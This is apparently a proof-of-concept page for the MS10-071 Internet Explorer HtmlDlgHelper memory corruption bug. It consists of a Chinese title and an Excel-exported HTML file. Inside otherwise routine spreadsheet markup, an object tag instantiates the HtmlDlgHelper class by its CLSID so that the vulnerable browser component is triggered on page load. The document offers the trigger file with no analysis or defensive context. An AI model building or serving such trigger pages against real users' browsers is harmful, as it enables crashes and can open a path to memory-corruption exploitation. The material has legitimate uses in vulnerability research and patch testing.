Microsoft IE HtmlDlgHelper类内存破坏漏洞（MS10-071）

<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel"> <head> <meta http-equiv=Content-Type content="text/html; charset=windows-1252"> <meta name=ProgId content=Excel.Sheet> <meta name=Generator content="Microsoft Excel 10"> <!--[if !mso]> <style> v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} x\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} </style> <![endif]--><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:LastAuthor>TEST</o:LastAuthor> <o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved> <o:Version>10.6858</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:DownloadComponents/> </o:OfficeDocumentSettings> </xml><![endif]--> <!--[if gte mso 9]><xml> <x:ExcelWorkbook> <x:ExcelWorksheets> <x:ExcelWorksheet> <x:Name>test</x:Name> <x:WorksheetOptions> <x:CodeName>Sheet1</x:CodeName> <x:Selected/> <x:DoNotDisplayGridlines/> <x:ProtectContents>False</x:ProtectContents> <x:ProtectObjects>False</x:ProtectObjects> <x:ProtectScenarios>False</x:ProtectScenarios> </x:WorksheetOptions> </x:ExcelWorksheet> </x:ExcelWorksheets> <x:WindowHeight>9345</x:WindowHeight> <x:WindowWidth>13260</x:WindowWidth> <x:WindowTopX>240</x:WindowTopX> <x:WindowTopY>60</x:WindowTopY> <x:ProtectStructure>False</x:ProtectStructure> <x:ProtectWindows>False</x:ProtectWindows> </x:ExcelWorkbook> </xml><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="1026"/> </xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--> </head> <body link=blue vlink=purple> <table x:str border=0 cellpadding=0 cellspacing=0 width=64 style='border-collapse: collapse;table-layout:fixed;width:48pt'> <col width=64 style='width:48pt'> <tr height=17 style='height:12.75pt'> <td height=17 width=64 style='height:12.75pt;width:48pt' align=left valign=top><!--[if gte vml 1]><v:shapetype id="_x0000_t201" coordsize="21600,21600" o:spt="201" path="m,l,21600r21600,l21600,xe"> <v:stroke joinstyle="miter"/> <v:path shadowok="f" o:extrusionok="f" strokeok="f" fillok="f" o:connecttype="rect"/> <o:lock v:ext="edit" shapetype="t"/> </v:shapetype><v:shape id="_x0000_s1025" type="#_x0000_t201" style='position:absolute; margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1' strokecolor="windowText [64]" o:insetmode="auto"> <![if gte mso 9]><o:title=""/> <![endif]><x:ClientData ObjectType="Pict"> <x:SizeWithCells/> <x:CF>Pict</x:CF> <x:AutoPict/> </x:ClientData> </v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout; position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px; height:17px'><![endif]> <object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B" id=obj></object> <![if !vml]></span><![endif]><span style='mso-ignore:vglayout2'> <table cellpadding=0 cellspacing=0> <tr> <td height=17 width=64 style='height:12.75pt;width:48pt'></td> </tr> </table> </span></td> </tr> <![if supportMisalignedColumns]> <tr height=0 style='display:none'> <td width=64 style='width:48pt'></td> </tr> <![endif]> </table> </body> </html>